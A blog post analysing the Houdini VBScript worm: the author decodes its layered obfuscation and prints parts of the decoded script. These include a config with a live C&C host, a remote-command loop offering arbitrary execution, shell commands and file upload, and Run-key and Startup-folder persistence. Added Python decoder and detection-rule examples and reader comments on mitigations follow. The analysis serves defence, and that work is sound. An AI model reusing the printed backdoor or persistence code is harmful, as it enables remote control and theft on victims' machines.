(Just in case you're wondering, this sample was detected by a custom HIPS rule looking for suspicious registry modifications. Would definitely recommend deploying custom HIPS rules if you haven't already!)
The Sample
The malware was created using VBScript and saved as a .vbe file. It did a great job of evading AV with a score of only 4/46 on VirusTotal, props to CAT-QuickHeal/Avast/Kaspersky/TrendMicro for detecting it!
I assumed I would be able to just open the file and see the malicious script. Well, it wasn't quite that simple... Opening the .vbe, all I got was a huge mass of characters:
After a quick Google I found out that VBE stands for VBScript Encoded (ahha moment!) and that I needed some way to decode the file. Luckily there was a great blog post with a sample script here:
Running the decode script against the encoded vbe we get some clear-text vbs.
Hmmm, another chunk of encoded text. It does appear to be passed to a function called deCrypt though, and looking down the script we come to the actual deCrypt function.
The decrypt function calls decodeBase64, which converts our data from Base64 to ASCII. Also note that the decrypt routine is run twice (once in each screenshot) before the result is finally executed. Now we could write a decode script, or we could just use an online converter (http://www.hcidata.info/base64.htm):
Decoding Once (Still garbled...)
Decoding Twice (Woohoo code!)
So we have a variable... but also more encoded text. Scrolling down we come to the decryption routine:
Decryption removes the |dz| padding, then for each item in the array appends to the previous item the ASCII character for that character code, and finally executes the resulting string. To get the plain-text script I just patched the existing script to write its output to a file instead of executing it.
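To make the two decoding stages above concrete (the double decodeBase64 pass and the |dz| character-code array), here is a stand-alone Python decoder. It is an added example, not the post's or the malware's own code, and the exact layout of the character array is an assumption: I take every decimal code to be prefixed with "|dz|" and the codes to be joined with "&", since the post only says the padding is stripped and each code is turned into a character. Like the patched script in the post, it writes the recovered VBScript to a file rather than executing it.

```python
import base64
import sys

# Layout assumed for this example (constructed, not lifted from the sample): every
# character code is prefixed with the "|dz|" marker and codes are joined with "&".
DZ_MARKER = "|dz|"
CODE_SEP = "&"


def encode_houdini_like(script: str) -> str:
    """Build a test blob with the layers the post describes: character-code array,
    then Base64 applied twice. Constructed only so the decoder can be exercised offline."""
    code_array = CODE_SEP.join(f"{DZ_MARKER}{ord(ch)}" for ch in script)
    once = base64.b64encode(code_array.encode("ascii")).decode("ascii")
    return base64.b64encode(once.encode("ascii")).decode("ascii")


def decode_base64_twice(blob: str) -> str:
    """Undo the two decodeBase64 passes. Decoding once still looks garbled,
    exactly as the post observes; the second pass yields the character array."""
    once = base64.b64decode(blob).decode("ascii")
    return base64.b64decode(once).decode("ascii")


def decode_char_array(payload: str) -> str:
    """Strip the |dz| padding, then map each decimal code to its character."""
    stripped = payload.replace(DZ_MARKER, "")
    chars = []
    for token in stripped.split(CODE_SEP):
        token = token.strip()
        if not token:
            continue
        if not token.isdigit():
            # A non-numeric token means the assumed layout is wrong; fail loudly
            # rather than silently emitting a truncated script.
            raise ValueError(f"unexpected token in character array: {token!r}")
        chars.append(chr(int(token)))
    return "".join(chars)


def decode_sample(blob: str) -> str:
    """Full pipeline: Base64 twice, then the character-code array."""
    return decode_char_array(decode_base64_twice(blob))


def main(argv):
    # Usage: python decode_houdini.py encoded.txt recovered.vbs
    # The recovered script is written to disk, never executed.
    src, dst = argv[1], argv[2]
    with open(src, encoding="ascii", errors="ignore") as fh:
        blob = fh.read()
    script = decode_sample(blob)
    with open(dst, "w", encoding="utf-8") as fh:
        fh.write(script)
    print(f"wrote {len(script)} characters to {dst}")


if __name__ == "__main__":
    main(sys.argv)
```

The encoder exists only to produce test input; when the real sample uses a different separator, change CODE_SEP and the ValueError will tell you if the guess is still wrong.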
And finally we get to the actual VBScript:
'<[ recoder : houdini (c) skype : houdini-fx ]>
'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=
host = "zoia.no-ip.org"
port = 446
installdir = "%appdata%"
lnkfile = true
lnkfolder = true
'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=
dim shellobj
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")
'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=
installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
(Continued below...)
Straight away you notice the author has proudly placed his name and Skype handle at the top of the script (cue Krebs-style investigation!). Next there's the callback domain, where he's using the dynamic DNS service no-ip.org.
When run, the script repeatedly connects to the C&C and attempts to receive commands.
while true
    install
    response = ""
    response = post ("is-ready","")
    cmd = split (response,spliter)
    select case cmd (0)
        case "excecute"
            param = cmd (1)
            execute param
        case "update"
            param = cmd (1)
            oneonce.close
            set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false)
            oneonce.write param
            oneonce.close
            shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
            wscript.quit
        case "uninstall"
            uninstall
        case "send"
            download cmd (1),cmd (2)
        case "recv"
            param = cmd (1)
            upload (param)
        case "cmd-shell"
            param = cmd (1)
            post "is-cmd-shell",cmdshell (param)
        case "delete"
            param = cmd (1)
            deletefaf (param)
        case "exit-process"
            param = cmd (1)
            exitprocess (param)
        case "sleep"
            param = cmd (1)
            sleep = eval (param)
    end select
    wscript.sleep sleep
wend
Looking at the install routine we can see the script creates Run keys and a copy of itself in the Startup folder to maintain persistence.
sub upstart ()
    on error resume Next
    shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
    shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
    filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
    filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true
end sub
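The post opens by saying this sample was caught by a custom HIPS rule watching for suspicious registry modifications, and the upstart routine above shows exactly what such a rule should key on: a Run value that launches wscript.exe with //B against a script sitting in %appdata%, %temp% or the Startup folder. Below is an added Python example of that detection logic run over constructed registry and file events; it is not the post's HIPS rule or any vendor's product, and the event layout (key, value name, data) is an assumption about what a sensor would report.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Run keys written by upstart() above, compared case-insensitively.
RUN_KEYS = (
    r"hkey_current_user\software\microsoft\windows\currentversion\run",
    r"hkey_local_machine\software\microsoft\windows\currentversion\run",
)
SCRIPT_HOST = re.compile(r"\b[wc]script(?:\.exe)?\b", re.IGNORECASE)
SILENT_FLAG = re.compile(r"(?<!\S)//b(?!\S)", re.IGNORECASE)
USER_WRITABLE = re.compile(r"%appdata%|%temp%|\\appdata\\|\\temp\\|\\startup\\", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(?:vbs|vbe|js|jse|wsf)$", re.IGNORECASE)


@dataclass
class RegValueEvent:
    """One registry value-set event as a HIPS/EDR sensor might report it (assumed layout)."""
    key: str
    name: str
    data: str


def classify_run_value(evt: RegValueEvent) -> List[str]:
    """Return the reasons a Run-key write looks like script-based persistence, or []."""
    if not evt.key.lower().startswith(RUN_KEYS):
        return []  # not a Run key, out of scope for this rule
    script_host = SCRIPT_HOST.search(evt.data) is not None
    user_writable = USER_WRITABLE.search(evt.data) is not None
    # High-confidence only when a script host is pointed at a user-writable path;
    # a script host alone (e.g. an admin logon script under System32) is routine.
    if not (script_host and user_writable):
        return []
    reasons = ["Run value launches a Windows Script Host",
               "script lives in a user-writable location"]
    if SILENT_FLAG.search(evt.data):
        reasons.append("//B suppresses script errors and prompts")
    return reasons


def is_suspicious_startup_copy(path: str) -> bool:
    """File-create check for the second persistence method: a script dropped into Startup."""
    return bool(re.search(r"\\startup\\", path, re.IGNORECASE) and SCRIPT_EXT.search(path))


def sample_events() -> List[RegValueEvent]:
    """Constructed events; the first mirrors what upstart() writes, the rest are benign."""
    return [
        RegValueEvent(r"HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run",
                      "dropper", r'wscript.exe //B "C:\Users\alice\AppData\Roaming\dropper.vbe"'),
        RegValueEvent(r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
                      "OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
        RegValueEvent(r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
                      "LogonScript", r'cscript.exe //B "C:\Windows\System32\inventory.vbs"'),
        RegValueEvent(r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer",
                      "ShellState", r"wscript.exe //B %appdata%\x.vbs"),
    ]


def scan(events: List[RegValueEvent]) -> List[Tuple[RegValueEvent, List[str]]]:
    """Apply the rule to a batch of events and keep the hits with their reasons."""
    hits = []
    for evt in events:
        reasons = classify_run_value(evt)
        if reasons:
            hits.append((evt, reasons))
    return hits


if __name__ == "__main__":
    for evt, reasons in scan(sample_events()):
        print(f"{evt.key}\\{evt.name}: {evt.data}")
        for r in reasons:
            print(f"  - {r}")
```

Of the four constructed events only the first fires: the OneDrive entry is under AppData but is not a script, the logon script uses //B but lives under System32, and the last write is a script host but not to a Run key. Requiring both conditions is what keeps the rule quiet on normal workstations while still matching the combination upstart() produces.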
The script contains multiple functions the C&C owner can call upon: for example to install/uninstall, download/upload files, enumerate/kill processes, run arbitrary commands and spread using LNK files. As I had an infected machine, I modified the original script to create a cleaner script that would call the uninstall function.
The malware appears to be quite recent, as when Googling the plain-text script I could see only one post about it. The link below also has a copy of the whole script:
http://social.technet.microsoft.com/Forums/en-US/f80f10c6-ae6c-4f63-96ec-9d49d582764a/virus-acceso-directo-en-discos-extraibles
Final Thoughts
Manual binary analysis can be tricky, so I normally let Cuckoo (http://www.cuckoosandbox.org/) do all the hard work, but until Cuckoo supports VBScript, manual analysis seems to be the only option.
While the malicious script had some great functionality, I was surprised how badly it had been obfuscated. In the web app world JavaScript obfuscators can be a nightmare: renaming variables, breaking everything up into a million different concatenations and dummy functions. All this script had was a basic encoding routine and some Base64 conversion. Lazy script kiddie, maybe?
Hope you guys found this useful.
Pdizzle out.
Haha... Hi. So I came across a similar script recently, it's causing havoc at my school (i.e. a university in South Africa)... at first I thought it was home-grown from one of the IT labs but I learned otherwise... it's different in that it seems to pre-date yours, as the actual .vbs file is not encoded.
Here are its first (significant) lines:
****************************************
'< -cyber Crypter ->
t1 = shadows
t1 = hexDecode(t1)
Safa7_22 = deCrypt (t1)
EXECUTE (Safa7_22)
****************************************
Anyway, I didn't even bother decrypting (for lack of a better term) the code... I simply let the script do all the work, commented out the EXECUTE and made it output "Safa7_22" to a file. Worked like a charm. The output matches yours except the host address is different.
Just thought I'd share.
I like the site, InfoSec has been an interest of mine for a while now.
Anyway I'm out.
Hi! Thanks for this wonderful tutorial.
This is one of the easiest ways I've seen to decrypt the Houdini worm.
Anyway, regarding the initial encoded script,
an easier way to decode it can be to replace "EXECUTE(Safa7_22)" with
Set fso = CreateObject ("Scripting.FileSystemObject")
Set stdout = fso.CreateTextFile("output.txt")
stdout.Writeline Safa7_22
output.txt will now contain the script with "DZCLOVER".
Very good blog, by the way :)
@Tumi - We had the same issue: it was spreading across multiple machines. There are a number of different mitigations; you can try submitting a sample to your AV vendor, implementing HIPS rules to block file/registry creation and access, or proxy/firewall rules to block and detect the callbacks. Restricting USB is also recommended, although not always possible.
@Anthony - Thanks for the decrypt shortcut + comments!
Very good article I like it, there are not many tutorials about deobfuscating encoded .vbs files. Can you help me to deobfuscate a malicious .vbs? I have problems with it...
Thanks John, have you got a link where I can view the code?
Thank you for your prompt reply. You can send me an email at admin(at)cleanbytes.net with your email and I can send the file in an email attachment. You can see the article about that vbs malware there: http://cleanbytes.net/vbscript-shortcuts-virus-removal and I am eager to see what it really contains. Thank you again for your time.
I also found this malware on my friend Claudia's flash drive (a bit late though) and couldn't resist the temptation to let it be my first malware reverse engineered. Was like a soft massage to my brain, a great entertainment to spend a couple of hours on. Dear old VB6... Thank you all for sharing this info. Now I'm going to treat this file differently.
Impressive coding skills.